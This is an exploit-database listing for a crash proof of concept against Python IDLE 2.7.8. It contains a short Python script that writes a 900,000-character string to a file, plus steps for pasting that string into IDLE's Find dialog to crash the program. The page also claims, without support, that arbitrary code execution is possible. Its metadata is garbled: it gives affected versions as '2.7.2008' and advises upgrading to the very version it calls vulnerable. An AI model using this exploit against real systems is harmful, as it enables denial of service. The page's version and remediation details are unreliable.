header-logo
Suggest Exploit
vendor:
IDLE
by:
Hadi Zomorodi Monavar
9.3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: IDLE
Affected Version From: 2.7.2008
Affected Version To: 2.7.2008
Patch Exists: YES
Related CWE: N/A
CPE: 2.7.2008
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 / Windows 8.1
2020

Python IDLE 2.7.8 – Crash Proof Of Concept

A buffer overflow vulnerability exists in Python IDLE 2.7.8, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to a boundary error when handling a specially crafted file. This can be exploited to cause a stack-based buffer overflow via an overly long string. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of Python IDLE 2.7.8
Source

Exploit-DB raw data:

#!/usr/bin/env python
# Title : Python IDLE 2.7.8  - Crash Proof Of Concept
# Website : http://www.python.org/idle/
# Tested : Windows 7 / Windows 8.1
#
#
# Author      :   Hadi Zomorodi Monavar
# Email       :   zomorodihadi@gmail.com
#
# 1 . run python code : python poc.py
# 2 . open r3z4.txt and copy content to clipboard
# 3 . open "python 2.7.8 IDLE"
# 4 . from Menu (edit --> find)
# 5 . Paste ClipBoard on "find"
# 6 . Enter
# 7 . Crashed ;)

crash = "\x41"*900000 #B0F
file = open("r3z4.txt", "w")
file.write(crash)
file.close()

Navigation

Suggest Exploit

Services By CQR